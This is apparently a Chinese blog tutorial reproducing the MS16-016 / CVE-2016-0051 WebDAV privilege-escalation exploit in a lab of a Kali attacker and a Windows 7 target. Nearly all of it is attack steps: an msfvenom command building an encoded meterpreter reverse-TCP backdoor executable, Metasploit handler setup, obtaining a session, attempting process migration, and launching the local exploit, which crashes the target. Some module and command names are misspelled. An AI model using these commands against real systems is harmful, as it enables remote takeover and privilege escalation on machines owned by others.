当前位置: 代码迷 >> 综合 >> CVE-2016-0051(WebDaV)漏洞复现
  详细解决方案

CVE-2016-0051(WebDaV)漏洞复现

热度:22   发布时间:2024-02-08 07:34:25.0

MS16-016(WebDaV)漏洞复现
目标机:win7x64 192.168.235.142
攻击机:kali 192.168.235.137
1、 确定目标主机和攻击机能够ping通
在这里插入图片描述
在这里插入图片描述
2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端口号) -e(-e表示encoder编码) x86/shinkata_ga_nai -i(-I 编码次数) 5 -b(将制定特征进行再编码) ‘x00’ -f(生成文件的格式) exe -o(生成路径及文件名) /root/1.exe
在这里插入图片描述
3、打开win7主机上的winSCP软件用来模仿文件下载
在这里插入图片描述
4、登录192.168.235.137 端口默认22 用来下载文件
在这里插入图片描述
5、已经登录到这个服务器进行文件下载
在这里插入图片描述
将文件1.exe的文件下载到桌面上木马文件已经上传
6、启动msf 终端输入msfconsole
在这里插入图片描述
7、终端中输入use exploit/multi/handler 进入到该模块 show options查看选项
在这里插入图片描述
8、set payload windows/meterpreter/reverse_tcp设置生成木马时 用的payload
在这里插入图片描述
9、show options 设置本地IP 端口 set LHOST 192.168.235.137 set LPORT 2222
在这里插入图片描述
在这里插入图片描述
10、show options 查看配置后的信息
在这里插入图片描述
11、输入run开始监听目标机
在这里插入图片描述
12、双击win7上的1.exe返回kali一个会话
在这里插入图片描述
输入session -l 查看会话id 看到是1 输入session 1
得到meterpreter
在这里插入图片描述
13、输入sysinfo查看目标机信息
在这里插入图片描述
输入getuid 查看当前获取的用户权限
在这里插入图片描述
14、终端中输入ps 看见木马程序1.exe的进程id为 2924
在这里插入图片描述
15、输入migrate 1608尝试将其添加到mysqld 进程中
在这里插入图片描述结果权限不够
16、输入background转入后台.
在这里插入图片描述
17、下面我们进行提权 search ms16 搜索这个相关的模块
并切换到该模块
在这里插入图片描述
在这里插入图片描述
配置会话id
在这里插入图片描述
18、run进行攻击导致蓝屏